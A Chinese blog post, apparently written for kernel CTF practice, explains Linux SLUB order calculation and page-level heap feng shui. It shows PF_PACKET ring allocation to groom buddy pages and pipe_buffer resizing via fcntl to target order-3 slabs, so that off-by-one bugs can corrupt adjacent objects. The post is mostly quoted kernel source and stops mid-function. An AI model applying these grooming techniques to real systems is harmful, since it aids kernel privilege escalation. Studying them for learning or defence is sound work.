向pipe_buffer说yes!
196082 慢慢好起来

image-20230510125707322

前言

起因是墨晚鸢大佬的一句回复,不过我这里还没尝试挖掘新的东西,更多的是对墨晚鸢佬的内容做适合自己理解的总结。可以看到标签中还有一个上一篇文章主要介绍的io_uring,这里就先说说。

万字警告!!!

io_uring在堆喷中的局限性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int __io_account_mem(struct user_struct *user, unsigned long nr_pages)
{
unsigned long page_limit, cur_pages, new_pages;

if (!nr_pages)
return 0;

/* Don't allow more pages than we can safely lock */
page_limit = rlimit(RLIMIT_MEMLOCK) >> PAGE_SHIFT;

cur_pages = atomic_long_read(&user->locked_vm);
do {
new_pages = cur_pages + nr_pages;
if (new_pages > page_limit)
return -ENOMEM;
} while (!atomic_long_try_cmpxchg(&user->locked_vm,
&cur_pages, new_pages));
return 0;
}

在我进行一次堆喷过后,并使用update去修改内容是会返回错误-12,则是在上面的函数中,new_page超过了可以安全lock的page数量,也就是new_pages > page_limit导致的。

而上面这个函数最初是由io_sqe_buffer_register函数调用的,所以不幸的是在对io_uring进行分配的时候就要开始考虑了。所以在我们平时动不动就要面对4096次之类的大范围堆喷时io_uring就显得有点儿力不从心了。

不过除了以上这样一点缺点io_uring的表现依旧是令人满意的。

slab分配源码分析

众所周知,分配slab的机制为buddy system机制进行的。而进行分配的最终函数为alloc_slab_page函数进行分配,并且大家都知道buddy system分配时大小为PAGE_SIZE * pow(2,order),所以order的由来就显得尤为重要了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
static inline unsigned int oo_order(struct kmem_cache_order_objects x)
{
return x.x >> OO_SHIFT;
}

static inline struct slab *alloc_slab_page(gfp_t flags, int node,
struct kmem_cache_order_objects oo)
{
struct folio *folio;
struct slab *slab;
unsigned int order = oo_order(oo);

if (node == NUMA_NO_NODE)
folio = (struct folio *)alloc_pages(flags, order);
else
folio = (struct folio *)__alloc_pages_node(node, flags, order);

if (!folio)
return NULL;

slab = folio_slab(folio);
__folio_set_slab(folio);
/* Make the flag visible before any changes to folio->mapping */
smp_wmb();
if (page_is_pfmemalloc(folio_page(folio, 0)))
slab_set_pfmemalloc(slab);

return slab;
}

可以看到在alloc_slab_page函数中使用order是在oo中,而这个oo这时kmem_cache结构体中的成员。

kmem_cache_create_usercopy流程

kmem_cache_create_usercopy用来注册一个cache,所以他也会分配一个slab供他自己使用,不过分配的时间点是在这个cache中第一次申请object的时候触发的。而kmem_cache_create_usercopy函数主要是对slab的初始化,其中就包括了我们比较关注的order了。

因为前半部分的函数都没有直接和order产生关系,所以这里就给一下大家调用连不贴源码占篇幅了。

kmem_cache_create_usercopy=>create_cache=>__kmem_cache_create=>kmem_cache_open=>calculate_sizes

calculate_sizes函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
static int calculate_sizes(struct kmem_cache *s)
{
slab_flags_t flags = s->flags;
unsigned int size = s->object_size;
unsigned int order;

... ...
order = calculate_order(size);

if ((int)order < 0)
return 0;

s->allocflags = 0;
if (order)
s->allocflags |= __GFP_COMP;

if (s->flags & SLAB_CACHE_DMA)
s->allocflags |= GFP_DMA;

if (s->flags & SLAB_CACHE_DMA32)
s->allocflags |= GFP_DMA32;

if (s->flags & SLAB_RECLAIM_ACCOUNT)
s->allocflags |= __GFP_RECLAIMABLE;

/*
* Determine the number of objects per slab
*/
s->oo = oo_make(order, size);
s->min = oo_make(get_order(size), size);

return !!oo_objects(s->oo);
}

可以看到在函数最后这部分就是对oo的赋值,所以理所应当去calculate_order理清逻辑。

calculate_order函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
static inline int calculate_order(unsigned int size)
{
unsigned int order;
unsigned int min_objects;
unsigned int max_objects;
unsigned int nr_cpus;

/*
* Attempt to find best configuration for a slab. This
* works by first attempting to generate a layout with
* the best configuration and backing off gradually.
*
* First we increase the acceptable waste in a slab. Then
* we reduce the minimum objects required in a slab.
*/
min_objects = slub_min_objects;
if (!min_objects) {
/*
* Some architectures will only update present cpus when
* onlining them, so don't trust the number if it's just 1. But
* we also don't want to use nr_cpu_ids always, as on some other
* architectures, there can be many possible cpus, but never
* onlined. Here we compromise between trying to avoid too high
* order on systems that appear larger than they are, and too
* low order on systems that appear smaller than they are.
*/
nr_cpus = num_present_cpus();
if (nr_cpus <= 1)
nr_cpus = nr_cpu_ids;
min_objects = 4 * (fls(nr_cpus) + 1);
}
max_objects = order_objects(slub_max_order, size);
min_objects = min(min_objects, max_objects);

while (min_objects > 1) {
unsigned int fraction;

fraction = 16;
while (fraction >= 4) {
order = calc_slab_order(size, min_objects,
slub_max_order, fraction);
if (order <= slub_max_order)
return order;
fraction /= 2;
}
min_objects--;
}

/*
* We were unable to place multiple objects in a slab. Now
* lets see if we can place a single object there.
*/
order = calc_slab_order(size, 1, slub_max_order, 1);
if (order <= slub_max_order)
return order;

/*
* Doh this slab cannot be placed using slub_max_order.
*/
order = calc_slab_order(size, 1, MAX_ORDER, 1);
if (order < MAX_ORDER)
return order;
return -ENOSYS;
}

可以注意到最终的order是由calc_slab_order函数生成的。而这里的min_objects变量可以看到是由slub_min_objects赋值的。这个全局变量的含义是:每个slab的最小object数量,在没有配置的情况下是0。不过可以看到如果是0的话会进入到紧接着的if语句内,内部的nr_cpu_ids变量的值是处理器数。fls 可以获取参数的最高有效 bit 的位数,比如 fls(0)=0,fls(1)=1,fls(4) = 3。如果当前系统中有4个cpu,那么 min_object 的初始值为 4*(3+1) = 16。

1
2
3
4
5
6
7
8
9
10
11
12
~ cat /proc/kallsyms | grep slub_min_objects
ffffffff8a23b2d0 t __cfi_setup_slub_min_objects
ffffffff8a23b2e0 t setup_slub_min_objects
ffffffff8a4348af t __setup_str_setup_slub_min_objects
ffffffff8a45e460 t __setup_setup_slub_min_objects
ffffffff8b3d5fbc b slub_min_objects

------

pwndbg> x/1xw 0xffffffff8b3d5fbc
0xffffffff8b3d5fbc: 0x00000000
pwndbg>
1
2
3
4
5
6
7
8
9
10
11
~ cat /proc/kallsyms | grep nr_cpu_ids
ffffffff97f73fa8 D nr_cpu_ids
ffffffff98025f10 T __cfi_setup_nr_cpu_ids
ffffffff98025f20 T setup_nr_cpu_ids
ffffffff990f3098 b rcu_init_geometry.old_nr_cpu_ids

------

pwndbg> x/1xw 0xffffffff97f73fa8
0xffffffff97f73fa8: 0x00000004
pwndbg>

按照上述步骤查看之后可以看到nr_cpu_ids的值为4,所以这里的min_object的值为0x10

而函数中fraction是对于碎片的一种指标。碎片大小不能超过 (slab所占内存大小 / fraction),fraction 值越大,slab 中所能容忍的碎片就越小。

calc_slab_order函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
int ilog2(unsigned long v)
{
int l = 0;
while ((1UL << l) < v)
l++;
return l;
}

static __always_inline __attribute_const__ int get_order(unsigned long size)
{
if (__builtin_constant_p(size)) {
if (!size)
return BITS_PER_LONG - PAGE_SHIFT;

if (size < (1UL << PAGE_SHIFT))
return 0;

return ilog2((size) - 1) - PAGE_SHIFT + 1;
}

size--;
size >>= PAGE_SHIFT;
#if BITS_PER_LONG == 32
return fls(size);
#else
return fls64(size);
#endif
}

static inline unsigned int calc_slab_order(unsigned int size,
unsigned int min_objects, unsigned int max_order,
unsigned int fract_leftover)
{
unsigned int min_order = slub_min_order;
unsigned int order;

if (order_objects(min_order, size) > MAX_OBJS_PER_PAGE)
return get_order(size * MAX_OBJS_PER_PAGE) - 1;

for (order = max(min_order, (unsigned int)get_order(min_objects * size));
order <= max_order; order++) {

unsigned int slab_size = (unsigned int)PAGE_SIZE << order;
unsigned int rem;

rem = slab_size % size;

if (rem <= slab_size / fract_leftover)
break;
}
return order;
}

这个函数就是最终计算出order的函数了,可以看到这里会从slab所需要的最小order到最大order之间开始遍历,查找能够使slab碎片最小的order值。而rem则是slab的碎片大小:分配完object之后,所产生的碎片大小。碎片大小rem不能超过slab_size / fract_leftover即符合要求。

这里的get_order函数也较为简单,这狗屎玩意,开始看错了文件导致一直看不懂,硬生生看了两个小时才反应过来了。也就是根据size返回对应的最小的order,所以这里的如果根据上一个函数中的min_object的值为0x10来看的话,最终返回的order也就是3。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static inline unsigned int order_objects(unsigned int order, unsigned int size)
{
return ((unsigned int)PAGE_SIZE << order) / size;
}

static inline struct kmem_cache_order_objects oo_make(unsigned int order,
unsigned int size)
{
struct kmem_cache_order_objects x = {
(order << OO_SHIFT) + order_objects(order, size)
};

return x;
}

最后由oo_make函数写入到oo成员中去了。

kmem_cache_alloc流程

可以看到前面kmem_cache_create_usercopy函数只是对kmem_cache结构体里面的成员进行初始化赋值,并没有实质性的生成slab。而真正分配slab是在第一次对这个cache申请object的时候,也就是这个小标题的函数。

这里的调用流程就是:kmem_cache_alloc=>__kmem_cache_alloc_lru=>slab_alloc=>slab_alloc_node=>__slab_alloc_node=>new_slab=>allocate_slab=>alloc_slab_page

__slab_alloc_node函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
static void *__slab_alloc_node(struct kmem_cache *s,
gfp_t gfpflags, int node, unsigned long addr, size_t orig_size)
{
struct partial_context pc;
struct slab *slab;
void *object;

pc.flags = gfpflags;
pc.slab = &slab;
pc.orig_size = orig_size;
object = get_partial(s, node, &pc);

if (object)
return object;

slab = new_slab(s, gfpflags, node);
if (unlikely(!slab)) {
slab_out_of_memory(s, gfpflags, node);
return NULL;
}

object = alloc_single_from_new_slab(s, slab, orig_size);

return object;
}

可以看到分配顺序就是首先访问partial指针中,如果其中没有可以返回的object就会执行到new_slab函数分配新的slab。

alloc_single_from_new_slab函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
static void *alloc_single_from_new_slab(struct kmem_cache *s,
struct slab *slab, int orig_size)
{
int nid = slab_nid(slab);
struct kmem_cache_node *n = get_node(s, nid);
unsigned long flags;
void *object;


object = slab->freelist;
slab->freelist = get_freepointer(s, object);
slab->inuse = 1;

if (!alloc_debug_processing(s, slab, object, orig_size))
/*
* It's not really expected that this would fail on a
* freshly allocated slab, but a concurrent memory
* corruption in theory could cause that.
*/
return NULL;

spin_lock_irqsave(&n->list_lock, flags);

if (slab->inuse == slab->objects)
add_full(s, n, slab);
else
add_partial(n, slab, DEACTIVATE_TO_HEAD);

inc_slabs_node(s, nid, slab->objects);
spin_unlock_irqrestore(&n->list_lock, flags);

return object;
}

这里主要做的事就是首先取下freelist指向的object,随后将slab添加到partial指针处。

allocate_slab函数

上面提到了new_slab函数,其实实质上调用的是这个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
static struct slab *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
struct slab *slab;
struct kmem_cache_order_objects oo = s->oo;
gfp_t alloc_gfp;
void *start, *p, *next;
int idx;
bool shuffle;

... ...

slab = alloc_slab_page(alloc_gfp, node, oo);
if (unlikely(!slab)) {
oo = s->min;
alloc_gfp = flags;
/*
* Allocation may have failed due to fragmentation.
* Try a lower order alloc if possible
*/
slab = alloc_slab_page(alloc_gfp, node, oo);
if (unlikely(!slab))
return NULL;
stat(s, ORDER_FALLBACK);
}

slab->objects = oo_objects(oo);
slab->inuse = 0;
slab->frozen = 0;

account_slab(slab, oo_order(oo), s, flags);

slab->slab_cache = s;

kasan_poison_slab(slab);

start = slab_address(slab);

setup_slab_debug(s, slab, start);

shuffle = shuffle_freelist(s, slab);

if (!shuffle) {
start = fixup_red_left(s, start);
start = setup_object(s, start);
slab->freelist = start;
for (idx = 0, p = start; idx < slab->objects - 1; idx++) {
next = p + s->size;
next = setup_object(s, next);
set_freepointer(s, p, next);
p = next;
}
set_freepointer(s, p, NULL);
}

return slab;
}

这里对于新分配的slab首先写的就是他的freelist指针,所以根据上面外层函数的调用顺序来看,在刚挂载到freelist紧接着就会返回object并重新挂载到partial上。

也可以看到这个函数中调用了在slab分配分析开头给出的函数alloc_slab_page

页级堆风水构造

终于要说到跟题目有关系的内容了。

如果提到一个驱动存在off by null或者off by one漏洞时,我的第一反应就是这个CVE-2021-22555中的办法,使用大量堆喷来完成。但是如果题目的slab是由kmem_cache_create_usercopy创建的话困难就会存在很大的问题了,如果你当前使用堆喷的堆块的order与创建的cache不一致,这样只有极低的概率可以让驱动生成的slab紧邻堆喷的slab。所以为了提高脚本的稳定性,出现了这一利用手法。

其实这一手法以前在安全客中有看到但是当时并没有在意,所以现在借着墨晚鸢佬的博客学习一下。页级堆风水即以内存页为粒度的内存排布方式,而内核内存页的排布对我们来说不仅未知且信息量巨大,因此这种利用手法实际上是让我们手工构造一个新的已知的页级粒度内存页排布。

在上述解释完slab的分配过程想必应该都能理解buddy system了,他的基本原理就是以 2 的 order 次幂张内存页作为分配粒度,相同 order 间空闲页面构成双向链表,当低阶 order 的页面不够用时便会从高阶 order 取一份连续内存页拆成两半,其中一半挂回当前请求 order 链表,另一半返还给上层调用者;下图为以 order 2 为例的 buddy system 页面分配基本原理(偷的图):

偷

不难想到这个利用方式的原理就是:从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的,由此我们可以:

  • 向 buddy system 请求两份连续的内存页
  • 释放其中一份内存页,分配 vulnerable kmem_cache ,让其取走这份内存页
  • 释放另一份内存页,使用 victim kmem_cache 堆喷,让其取走这份内存页

那么此时我们可以使用vulnerable kmem_cacheoff by nulloff by one去修改到victim kmem_cache了。

分配任意数量任意大小page

根据上述内容来看,我们需要消耗掉小order的页面才能继续进行,这也就意味着我们需要一个可以申请指定order的API。这里选择是CVE-2017-7308中的方法。

当我们创建一个 protocolPF_PACKET 的 socket 之后,先调用 setsockopt()PACKET_VERSION 设为 TPACKET_V1 / TPACKET_V2,再调用 setsockopt() 提交一个 PACKET_TX_RING ,此时便存在如下调用链:

__sys_setsockopt=>sock->ops->setsockopt=>packet_setsockopt=>packet_set_ring=>alloc_pg_vec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}

可以看到的是这里alloc_pg_vec函数通过alloc_one_pg_vec_page函数申请buffer。并且这里申请的数量为req->tp_block_nr而req是用户可控的,所以这里申请的数量是可控的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* __get_free_pages failed, fall back to vmalloc */
buffer = vzalloc(array_size((1 << order), PAGE_SIZE));
if (buffer)
return buffer;

/* vmalloc failed, lets dig into swap here */
gfp_flags &= ~__GFP_NORETRY;
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* complete and utter failure */
return NULL;
}

alloc_one_pg_vec_page函数使用__get_free_pages申请到page。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
unsigned int optlen)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
int ret;

if (level != SOL_PACKET)
return -ENOPROTOOPT;

switch (optname) {
case PACKET_ADD_MEMBERSHIP:
case PACKET_DROP_MEMBERSHIP:
{
struct packet_mreq_max mreq;
int len = optlen;
memset(&mreq, 0, sizeof(mreq));
if (len < sizeof(struct packet_mreq))
return -EINVAL;
if (len > sizeof(mreq))
len = sizeof(mreq);
if (copy_from_sockptr(&mreq, optval, len))
return -EFAULT;
if (len < (mreq.mr_alen + offsetof(struct packet_mreq, mr_address)))
return -EINVAL;
if (optname == PACKET_ADD_MEMBERSHIP)
ret = packet_mc_add(sk, &mreq);
else
ret = packet_mc_drop(sk, &mreq);
return ret;
}

case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
case TPACKET_V1:
case TPACKET_V2:
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}
... ...
}
}

可以看到当我们的optnamePACKET_TX_RING时会调用到packet_set_ring,因为此时len的关系,我们还需要设置po->tp_versionTPACKET_V1/TPACKET_V2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
case PACKET_VERSION:
{
int val;

if (optlen != sizeof(val))
return -EINVAL;
if (copy_from_sockptr(&val, optval, sizeof(val)))
return -EFAULT;
switch (val) {
case TPACKET_V1:
case TPACKET_V2:
case TPACKET_V3:
break;
default:
return -EINVAL;
}
lock_sock(sk);
if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) {
ret = -EBUSY;
} else {
po->tp_version = val;
ret = 0;
}
release_sock(sk);
return ret;
}

想要修改到po->tp_version需要进入到这个case,所以需要进行两次调用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

if (req->tp_block_nr) {
unsigned int min_frame_size;

... ...

err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
... ...
}
... ...
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec);
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map);
rb->frame_max = (req->tp_frame_nr - 1);
rb->head = 0;
rb->frame_size = req->tp_frame_size;
spin_unlock_bh(&rb_queue->lock);

swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);

rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
po->prot_hook.func = (po->rx_ring.pg_vec) ?
tpacket_rcv : packet_rcv;
skb_queue_purge(rb_queue);
if (atomic_read(&po->mapped))
pr_err("packet_mmap: vma is busy: %d\n",
atomic_read(&po->mapped));
}
... ...
out_free_pg_vec:
if (pg_vec) {
bitmap_free(rx_owner_map);
free_pg_vec(pg_vec, order, req->tp_block_nr);
}
out:
return err;
}

可以看到这里的order是由req->tp_block_size确定的,而且req是用户可以控制的,所以这里的申请的page的order也是可控的。并且需要注意的是在if (closing || atomic_read(&po->mapped) == 0)这个条件分支中,会交换rb->pg_vec中的内容和当前函数中变量pg_vec中的内容,所以在最后不会执行到free_pg_vec函数。

释放

这里的释放流程很简单:packet_release=>packet_set_ring=>free_pg_vec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static void free_pg_vec(struct pgv *pg_vec, unsigned int order,
unsigned int len)
{
int i;

for (i = 0; i < len; i++) {
if (likely(pg_vec[i].buffer)) {
if (is_vmalloc_addr(pg_vec[i].buffer))
vfree(pg_vec[i].buffer);
else
free_pages((unsigned long)pg_vec[i].buffer,
order);
pg_vec[i].buffer = NULL;
}
}
kfree(pg_vec);
}

可以看到就是将里面的内容给释放掉。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
static int packet_release(struct socket *sock)
{
struct sock *sk = sock->sk;
struct packet_sock *po;
struct packet_fanout *f;
struct net *net;
union tpacket_req_u req_u;

if (!sk)
return 0;

... ...

lock_sock(sk);
if (po->rx_ring.pg_vec) {
memset(&req_u, 0, sizeof(req_u));
packet_set_ring(sk, &req_u, 1, 0);
}

if (po->tx_ring.pg_vec) {
memset(&req_u, 0, sizeof(req_u));
packet_set_ring(sk, &req_u, 1, 1);
}
... ...
}

很容易注意到的是都调用的packet_set_ring函数,而在packet_release函数中所给的参数中第三个参数为1。

1
2
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)

对比函数声明可以看出来这个参数就代表要关闭了,并且在执行这个函数之前memset(&req_u, 0, sizeof(req_u));执行了这样一条语句,也就导致req中的所有内容都为\x00,也就不进入分配的分支中去了。不过依旧会进入到进行各种swap的分支,因为在分配时走过一次,所以这次最后会调用到free_pg_vec函数了,而这个函数在这里说了就是释放掉所有页面。

总结

当我们耗尽 buddy system 中的 low order pages 后,我们再请求的页面便都是物理连续的,因此此时我们再进行 setsockopt() 便相当于获取到了一块近乎物理连续的内存(为什么是”近乎连续“是因为大量的 setsockopt() 流程中同样会分配大量我们不需要的结构体,从而消耗 buddy system 的部分页面)。

所以这里的使用流程就是,先使用上述办法进行堆喷。

  1. 释放一部分order为3的page,接着使用victim object进行申请这些页面
  2. 释放一个页面,使用vuln object申请这一页面
  3. 释放一部分order为3的page,再次让victim object申请到

再偷

最终实现上图这样的效果。

pipe_buffer

在以往的文章中出现了很多次的pipe_buffer,但是可惜的是使用的方式过于简单。比如,只是简单的利用他的ops指针进行泄漏或者覆盖它控制执行流,再就是Dirty Pipe中的利用。可恨的是我在做题的过程中并没有想到使用Dirty Pipe,即便是当时我已经对pipe_buffer所在的堆块上有绝对的权限了。所以这里就不再只是对其ops的利用了,后面主要就是破坏其page指针了。

pipe_buffer分配过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#define PIPE_DEF_BUFFERS	16

struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;

if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;

user_bufs = account_pipe_buffers(user, 0, pipe_bufs);

if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
user_bufs = account_pipe_buffers(user, pipe_bufs, PIPE_MIN_DEF_BUFFERS);
pipe_bufs = PIPE_MIN_DEF_BUFFERS;
}

if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
goto out_revert_acct;

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}

out_revert_acct:
(void) account_pipe_buffers(user, pipe_bufs, 0);
kfree(pipe);
out_free_uid:
free_uid(user);
return NULL;
}

可以看到在后面申请pipe->bufs使用了kcalloc函数,而这个函数的第一个参数分配的数量,第二参数就是每一个单位的大小。其实在其内部中也是会将这两个参数相乘起来的,而这两个值其实都是已知的,第一个为16,第二个为40,那么他们的结果就是640。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
struct kmem_cache *kmalloc_slab(size_t size, gfp_t flags)
{
unsigned int index;

if (size <= 192) {
if (!size)
return ZERO_SIZE_PTR;

index = size_index[size_index_elem(size)];
} else {
if (WARN_ON_ONCE(size > KMALLOC_MAX_CACHE_SIZE))
return NULL;
index = fls(size - 1);
}

return kmalloc_caches[kmalloc_type(flags)][index];
}

kcalloc函数中会到这里进行选择cache

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
const struct kmalloc_info_struct kmalloc_info[] __initconst = {
INIT_KMALLOC_INFO(0, 0),
INIT_KMALLOC_INFO(96, 96),
INIT_KMALLOC_INFO(192, 192),
INIT_KMALLOC_INFO(8, 8),
INIT_KMALLOC_INFO(16, 16),
INIT_KMALLOC_INFO(32, 32),
INIT_KMALLOC_INFO(64, 64),
INIT_KMALLOC_INFO(128, 128),
INIT_KMALLOC_INFO(256, 256),
INIT_KMALLOC_INFO(512, 512),
INIT_KMALLOC_INFO(1024, 1k),
INIT_KMALLOC_INFO(2048, 2k),
INIT_KMALLOC_INFO(4096, 4k),
INIT_KMALLOC_INFO(8192, 8k),
INIT_KMALLOC_INFO(16384, 16k),
INIT_KMALLOC_INFO(32768, 32k),
INIT_KMALLOC_INFO(65536, 64k),
INIT_KMALLOC_INFO(131072, 128k),
INIT_KMALLOC_INFO(262144, 256k),
INIT_KMALLOC_INFO(524288, 512k),
INIT_KMALLOC_INFO(1048576, 1M),
INIT_KMALLOC_INFO(2097152, 2M)
};

很明显这里选择的是kmalloc-cg-1k。然而,kmalloc-cg-1k来自于order为2的页面。但是根据前面的意思我们需要order为3的页面出来的,所以如果这里申请的页面order为2的话成功率会大打折扣。

pipe_buffer修改分配大小

pipe给人的惊喜是不断的,pipe可以提供了fcntl(F_SETPIPE_SZ)调用去修改每个pipe中pipe_buffer的数量。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
unsigned long user_bufs;
unsigned int nr_slots, size;
long ret = 0;

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue)
return -EBUSY;
#endif

size = round_pipe_size(arg);
nr_slots = size >> PAGE_SHIFT;

if (!nr_slots)
return -EINVAL;

... ...

ret = pipe_resize_ring(pipe, nr_slots);
if (ret < 0)
goto out_revert_acct;

pipe->max_usage = nr_slots;
pipe->nr_accounted = nr_slots;
return pipe->max_usage * PAGE_SIZE;

out_revert_acct:
(void) account_pipe_buffers(pipe->user, nr_slots, pipe->nr_accounted);
return ret;
}

这个函数中会调用到pipe_resize_ring函数,这里会根据size得到nr_slots,而在调用pipe_resize_ring函数时nr_slots为第二个参数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
struct pipe_buffer *bufs;
unsigned int head, tail, mask, n;

bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
if (unlikely(!bufs))
return -ENOMEM;

spin_lock_irq(&pipe->rd_wait.lock);
mask = pipe->ring_size - 1;
head = pipe->head;
tail = pipe->tail;

n = pipe_occupancy(head, tail);
if (nr_slots < n) {
spin_unlock_irq(&pipe->rd_wait.lock);
kfree(bufs);
return -EBUSY;
}

... ...
return 0;
}

可以注意到的是在这个函数开头的位置就调用了kcalloc函数,而这个函数的第一个参数就是我们可以通过fcntl调用修改的。如果,nr_slots的值为64,那么申请的size即为0xa00则会申请kmalloc-4k,此时order为3,可以大大提高成功率。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static inline int calculate_order(unsigned int size)
{
unsigned int order;
unsigned int min_objects;
unsigned int max_objects;
unsigned int nr_cpus;

/*
* Attempt to find best configuration for a slab. This
* works by first attempting to generate a layout with
* the best configuration and backing off gradually.
*
* First we increase the acceptable waste in a slab. Then
* we reduce the minimum objects required in a slab.
*/
min_objects = slub_min_objects;
if (!min_objects) {
/*
* Some architectures will only update present cpus when
* onlining them, so don't trust the number if it's just 1. But
* we also don't want to use nr_cpu_ids always, as on some other
